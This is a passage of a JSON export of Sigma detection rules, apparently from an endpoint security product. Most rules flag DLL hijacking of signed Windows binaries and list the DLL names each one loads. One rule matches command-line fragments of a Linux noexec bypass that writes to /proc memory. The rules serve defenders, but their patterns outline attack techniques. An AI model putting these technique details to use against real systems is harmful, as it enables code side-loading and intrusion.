"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096152Z",
"creation_date": "2026-03-23T11:45:34.096154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dccw.yml",
"content": "title: DLL Hijacking via dccw.exe\nid: f15da969-0fe2-4ed7-ac79-667f3384fed2\ndescription: |\n Detects potential Windows DLL Hijacking via dccw.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dccw.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ColorAdapterClient.dll'\n - '\\dxva2.dll'\n - '\\mscms.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f15da969-0fe2-4ed7-ac79-667f3384fed2",
"rule_name": "DLL Hijacking via dccw.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dccw.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f164f721-c2c7-4255-8c70-bd893ae67964",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094117Z",
"creation_date": "2026-03-23T11:45:34.094119Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094123Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secedit.yml",
"content": "title: DLL Hijacking via secedit.exe\nid: f164f721-c2c7-4255-8c70-bd893ae67964\ndescription: |\n Detects potential Windows DLL Hijacking via secedit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'secedit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SCECLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f164f721-c2c7-4255-8c70-bd893ae67964",
"rule_name": "DLL Hijacking via secedit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via secedit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1797d56-b576-44bf-a391-b0cf37acb95d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296344Z",
"creation_date": "2026-03-23T11:45:35.296346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296351Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries",
"https://github.com/hackerschoice/memexec/"
],
"name": "t1055_noexec_memory_injection_bypass.yml",
"content": "title: Filesystem noexec Mount Bypass via Process Memory Manipulation\nid: f1797d56-b576-44bf-a391-b0cf37acb95d\ndescription: |\n Detects attempts to bypass noexec mount restrictions through specific process memory manipulation patterns.\n Noexec mount restrictions are security controls that prevent the execution of binary files from specific filesystems or directories. When a filesystem is mounted with the noexec flag, the operating system blocks any attempt to run executable files stored in that location, even if the files have execute permissions set.\n Adversaries may try to bypass noexec restrictions to execute malicious payloads in restricted environments.\n It is recommended to investigate the detected process as well as its execution context.\nreferences:\n - https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries\n - https://github.com/hackerschoice/memexec/\ndate: 2024/12/02\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.execution\n - attack.t1059.004\n - attack.t1106\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_perl:\n Image|endswith: '/perl'\n CommandLine|contains|all:\n - 'perl'\n - 'syscall'\n - '319'\n - '279'\n - '/proc/'\n - '/fd/'\n\n selection_bash:\n Image|endswith: '/bash'\n CommandLine|contains|all:\n - 'bash -c'\n - 'cd /proc/$$'\n - 'exec 4>mem'\n - 'base64 -d'\n - 'dd bs=1 seek='\n - 'cat syscall|cut -f9 -d'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1797d56-b576-44bf-a391-b0cf37acb95d",
"rule_name": "Filesystem noexec Mount Bypass via Process Memory Manipulation",
"rule_description": "Detects attempts to bypass noexec mount restrictions through specific process memory manipulation patterns.\nNoexec mount restrictions are security controls that prevent the execution of binary files from specific filesystems or directories. When a filesystem is mounted with the noexec flag, the operating system blocks any attempt to run executable files stored in that location, even if the files have execute permissions set.\nAdversaries may try to bypass noexec restrictions to execute malicious payloads in restricted environments.\nIt is recommended to investigate the detected process as well as its execution context.\n",
"rule_creation_date": "2024-12-02",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1059.004",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1c03a14-5795-40c9-bf7f-a7ef5ca1e679",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096027Z",
"creation_date": "2026-03-23T11:45:34.096029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096033Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_calc.yml",
"content": "title: DLL Hijacking via calc.exe\nid: f1c03a14-5795-40c9-bf7f-a7ef5ca1e679\ndescription: |\n Detects potential Windows DLL Hijacking via calc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'calc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\execmodelproxy.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n - '\\twinui.appcore.dll'\n - '\\windows.storage.dll'\n # https://twitter.com/Kostastsale/status/1547738378333929473\n # https://twitter.com/executemalware/status/1547755534652022786\n - '\\WindowsCodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1c03a14-5795-40c9-bf7f-a7ef5ca1e679",
"rule_name": "DLL Hijacking via calc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via calc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1f2d679-b12b-4d64-8fd7-66c5b810de17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085825Z",
"creation_date": "2026-03-23T11:45:34.085827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085831Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mousocoreworker.yml",
"content": "title: DLL Hijacking via mousocoreworker.exe\nid: f1f2d679-b12b-4d64-8fd7-66c5b810de17\ndescription: |\n Detects potential Windows DLL Hijacking via mousocoreworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mousocoreworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmcmnutils.dll'\n - '\\dmiso8601utils.dll'\n - '\\iphlpapi.dll'\n - '\\profapi.dll'\n - '\\umpdc.dll'\n - '\\updatepolicy.dll'\n - '\\winsqlite3.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\microsoft\\onedrive\\'\n - '?:\\Users\\\\*\\AppData\\Local\\microsoft\\teams\\current\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\UUS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\UUS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1f2d679-b12b-4d64-8fd7-66c5b810de17",
"rule_name": "DLL Hijacking via mousocoreworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mousocoreworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f296e5e6-da5a-4057-bcce-17b516d2631f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098060Z",
"creation_date": "2026-03-23T11:45:34.098062Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098066Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_passwordonwakesettingflyout.yml",
"content": "title: DLL Hijacking via PasswordOnWakeSettingFlyout.exe\nid: f296e5e6-da5a-4057-bcce-17b516d2631f\ndescription: |\n Detects potential Windows DLL Hijacking via PasswordOnWakeSettingFlyout.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PasswordOnWakeSettingFlyout.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f296e5e6-da5a-4057-bcce-17b516d2631f",
"rule_name": "DLL Hijacking via PasswordOnWakeSettingFlyout.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PasswordOnWakeSettingFlyout.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2d084de-19ec-4053-b8f3-b3dab54a193a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075994Z",
"creation_date": "2026-03-23T11:45:34.075997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076001Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_plasrv.yml",
"content": "title: DLL Hijacking via plasrv.exe\nid: f2d084de-19ec-4053-b8f3-b3dab54a193a\ndescription: |\n Detects potential Windows DLL Hijacking via plasrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'plasrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\mintdh.dll'\n - '\\pdh.dll'\n - '\\tdh.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f2d084de-19ec-4053-b8f3-b3dab54a193a",
"rule_name": "DLL Hijacking via plasrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via plasrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2d6929c-142d-40dc-8ad3-c9a26eb24032",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078910Z",
"creation_date": "2026-03-23T11:45:34.078912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078917Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fvenotify.yml",
